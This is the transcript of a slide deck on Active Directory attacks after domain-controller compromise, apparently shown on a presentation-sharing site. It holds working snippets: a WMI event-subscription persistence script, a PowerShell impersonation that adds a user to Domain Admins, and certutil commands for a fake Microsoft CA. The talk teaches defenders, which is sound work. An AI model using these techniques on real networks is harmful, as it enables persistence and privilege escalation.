Presentation is loading. Please wait.

Presentation is loading. Please wait.

Ing. Ondrej Sevecek MCSM:Directory2012 | MVP:Security | CEH | MCSE:Windows2012 | What would a real hacker do to your AD.

Published byCalvin Ross Modified over 8 years ago

Similar presentations

Presentation on theme: "Ing. Ondrej Sevecek MCSM:Directory2012 | MVP:Security | CEH | MCSE:Windows2012 | What would a real hacker do to your AD."— Presentation transcript:

1 Ing. Ondrej Sevecek MCSM:Directory2012 | MVP:Security | CEH | MCSE:Windows2012 ondrej@sevecek.com | www.gopas.cz What would a real hacker do to your AD

2 Intro  What happens when they take one of your DCs?  You are doomed –must reinstall the whole forest from scratch –may be able to restore the whole forest from last clean backup provided you are sure the intrusion will not happen again

3 Why do I show these things  Secure machines physically  Do not use domain admin credentials on insecure machines  Separate administrative accounts  Never use admin accounts to access services  Stress on strong passwords or rather use smart cards

4 Agenda  Physical DC security  Password filters  Hidden accounts  Hidden scheduled tasks  Forest is a security boundary  Exploiting Kerberos delegation  Logon without passwords

5 Physical DC security  Having physical access means you have full power over data, settings and binaries –partially substitute physical security with BitLocker and TPM –use RODCs at insecure locations  Hardware keyloggers  Reboot and offline modifications

6 Password filters  Password change/reset after an attack means nothing  HKYE_LOCAL_MACHINE System CurrentControlSet Control LSA NotificationPackages = MULTI_SZ

7 Hidden accounts  You are never able to do a 100% security audit after an attack  Not even Domain Admins can see everything

8 Hidden scheduled tasks  You are never able to do a 100% security audit after an attack  Not even the prominent audit tools know everything –root\subscription –ActiveScriptEventConsumer Name = ScriptEngine = VBScript ScriptText = set fso = CreateObject("Scripting.FileSystemObject") : fileName = "c:\hackerFest" & "-" & Year(Now) & "-" & Month(Now) & "-" & Day(Now) & "-" & Hour(Now) & "-" & Minute(Now) & "-" & Second(Now) & ".txt" : set newFile = fso.CreateTextFile(fileName) : newFile.WriteLine("I will be here for ever!") : newFile.Close()

9 Hidden scheduled tasks  You are never able to do a 100% security audit after an attack  … continuing … –__EventFilter Name = QueryLanguage = WQL EventNamespace = root\cimv2 Query = SELECT * FROM __InstanceModificationEvent WHERE TargetInstance ISA "Win32_LocalTime" AND TargetInstance.Second = 9 Second, Minute, Hour, DayOfWeek, Month, Quarter, Year, WeekInMonth

10 Forest is a security boundary  Domain Admins from any domain of a forest are also Domain Admins in any other domain as well  Site level GPOs  No SID filtering inside forest

11 DE. gopas.virtual Subdomain scenario gopas.virtual CZ. gopas.virtual DE. gopas.virtual

12 Kerberos delegation with protocol transition  Password is not the only means how to log on to network services –no credentials necessary at all  Trust this computer to specified services only –Any authentication protocol

13 Kerberos delegation Client App Server DB LDAP FS Kamil

14 App Server DB LDAP FS Kamil Kerberos delegation with protocol transition

15 Delegation with PowerShell Adjust-Privilege 7 $true $winId = New-Object System.Security.Principal.WindowsIdentity 'kamil@gopas.cz' [Security.Principal.WindowsIdentity]::GetCurrent() $winId.Impersonate() [Security.Principal.WindowsIdentity]::GetCurrent() $domainAdmins = [ADSI] 'LDAP://CN=Domain Admins,CN=Users,DC=gopas,DC=virtual' $domainAdmins.Add('LDAP://CN=Leos,OU=People,OU=Company,DC= gopas,DC=virtual')

16 Smart card logon  Password is not the only means how to log on to computers  NTAuth CA –forest wide trust –do not need to consult AD or touch LDAP at all  Notes –ldap:///CN=GOPAS%20Root%20Online%20CA, CN=DC1,CN=CDP,CN=Public%20Key%20Servi ces,CN=Services,CN=Configuration,DC=gopas, DC=virtual?certificateRevocationList?base?obje ctClass=cRLDistributionPoint

17 Fake Microsoft CA  Something must always be trusted  Root CA –CN=Microsoft Root Authority,OU=Microsoft Corporation,OU=Copyright (c) 1997 Microsoft Corp.  Code signing cert –CN=Microsoft Corporation,OU=MOPR,O=Microsoft Corporation,L=Redmond,S=Washington,C=US

18 Fake Microsoft CA  Longer validity for issued certificates –CERTUTIL -setreg CA\ValidityPeriodUnits 5  No certificate template name extension –CERTUTIL -setreg policy\DisableExtensionList +1.3.6.1.4.1.311.21.7  No CRL paths into issued certificates –certutil -setreg DBFlags +DBFLAGS_ENABLEVOLATILEREQUESTS

19 ondrej@sevecek.com www.sevecek.com www.gopas.cz Thank you! and Watch out!

Download ppt "Ing. Ondrej Sevecek MCSM:Directory2012 | MVP:Security | CEH | MCSE:Windows2012 | What would a real hacker do to your AD."

Similar presentations

What’s New in Windows Server 2008 AD?

What’s New in Windows Server 2008 AD?
Single Sign-On with GRID Certificates Ernest Artiaga (CERN – IT) GridPP 7 th Collaboration Meeting July 2003 July 2003.

Single Sign-On with GRID Certificates Ernest Artiaga (CERN – IT) GridPP 7 th Collaboration Meeting July 2003 July 2003.
Deploying and Managing Active Directory Certificate Services

Deploying and Managing Active Directory Certificate Services
{ Best Practice Why reinvent the wheel?.   Domain controllers   Member servers   Client computers   User accounts   Group accounts   OUs 

{ Best Practice Why reinvent the wheel?.   Domain controllers   Member servers   Client computers   User accounts   Group accounts   OUs 
Ing. Ondřej Ševeček | GOPAS a.s. | MCSM:Directory | MVP:Enterprise Security | CEH:Certified Ethical Hacker | CHFI:Computer Hacking Forensic Investigator.

Ing. Ondřej Ševeček | GOPAS a.s. | MCSM:Directory | MVP:Enterprise Security | CEH:Certified Ethical Hacker | CHFI:Computer Hacking Forensic Investigator.
Securing the Borderless Network March 21, 2000 Ted Barlow.

Securing the Borderless Network March 21, 2000 Ted Barlow.
Security and Policy Enforcement Mark Gibson Dave Northey

Security and Policy Enforcement Mark Gibson Dave Northey
Implementing Native Mode and Internet Based Client Management.

Implementing Native Mode and Internet Based Client Management.
Kerberos Underworld Ondrej Sevecek | MCM: Directory | MVP: Security |

Kerberos Underworld Ondrej Sevecek | MCM: Directory | MVP: Security |
Ing. Ondřej Ševeček MCSM:Directory | MVP:Enterprise Security | Certified Ethical Hacker | MCSE:SharePoint | Smart card.

Ing. Ondřej Ševeček MCSM:Directory | MVP:Enterprise Security | Certified Ethical Hacker | MCSE:SharePoint | Smart card.
Ing. Ondřej Ševeček | GOPAS a.s. | MCM: Directory Services | MVP: Enterprise Security | | |

Ing. Ondřej Ševeček | GOPAS a.s. | MCM: Directory Services | MVP: Enterprise Security | | |
Vikram Thakur Introduction to Active Directory Structure.

Vikram Thakur Introduction to Active Directory Structure.
Ing. Ondřej Ševeček | GOPAS a.s. | MCM: Directory Services | MVP: Enterprise Security | Certified Ethical Hacker | |

Ing. Ondřej Ševeček | GOPAS a.s. | MCM: Directory Services | MVP: Enterprise Security | Certified Ethical Hacker | |
Module 1: Installing Active Directory Domain Services

Module 1: Installing Active Directory Domain Services
Module 1: Installing Active Directory Domain Services

Module 1: Installing Active Directory Domain Services
(ITI310) SESSIONS 9-10-11-12: Active Directory By Eng. BASSEM ALSAID.

(ITI310) SESSIONS : Active Directory By Eng. BASSEM ALSAID.
Efi Bregman Principal Consultant Microsoft Consulting Services Israel.

Efi Bregman Principal Consultant Microsoft Consulting Services Israel.
Module 1 Introduction to Managing Microsoft® Windows Server® 2008 Environment.

Module 1 Introduction to Managing Microsoft® Windows Server® 2008 Environment.
GROUP POLICY An overview of Microsoft Windows Group Policy.

GROUP POLICY An overview of Microsoft Windows Group Policy.
70-294: MCSE Guide to Microsoft Windows Server 2003 Active Directory Chapter 9: Active Directory Authentication and Security.

70-294: MCSE Guide to Microsoft Windows Server 2003 Active Directory Chapter 9: Active Directory Authentication and Security.

Similar presentations

Ads by Google